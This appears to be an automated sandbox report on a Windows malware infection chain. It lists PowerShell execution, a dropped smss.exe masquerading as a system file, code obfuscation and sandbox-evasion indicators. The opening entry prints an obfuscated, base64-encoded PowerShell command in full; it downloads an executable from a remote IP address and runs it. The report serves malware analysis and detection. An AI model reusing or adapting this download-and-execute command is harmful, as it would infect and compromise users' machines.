Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.cmdline" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A24B37 LoadLibraryA,GetProcAddress, 6_2_00A24B37
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A48945 push ecx; ret 6_2_00A48958
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041A963 push edi; retf 7_2_0041A96E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00411BB0 pushfd ; ret 7_2_00411BB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00403430 push eax; ret 7_2_00403432
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00414483 push edi; retf 7_2_0041448E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00418566 push esp; ret 7_2_00418567
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004015D0 push esp; ret 7_2_004015D2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B309AD push ecx; mov dword ptr [esp], ecx 7_2_03B309B6

Persistence and Installation Behavior
barindex
Drops PE files with benign system names
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\smss.exe Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\smss.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\smss[1].exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00A248D7
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00AA5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_00AA5376
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A43187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00A43187
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Roaming\smss.exe API/Special instruction interceptor: Address: 1A7A24C
Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FF84F7AD324
Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FF84F7AD7E4
Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FF84F7AD944
Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FF84F7AD504
Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FF84F7AD544
Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FF84F7AD1E4
Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FF84F7ADA44
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5BBA0 rdtsc 7_2_03B5BBA0
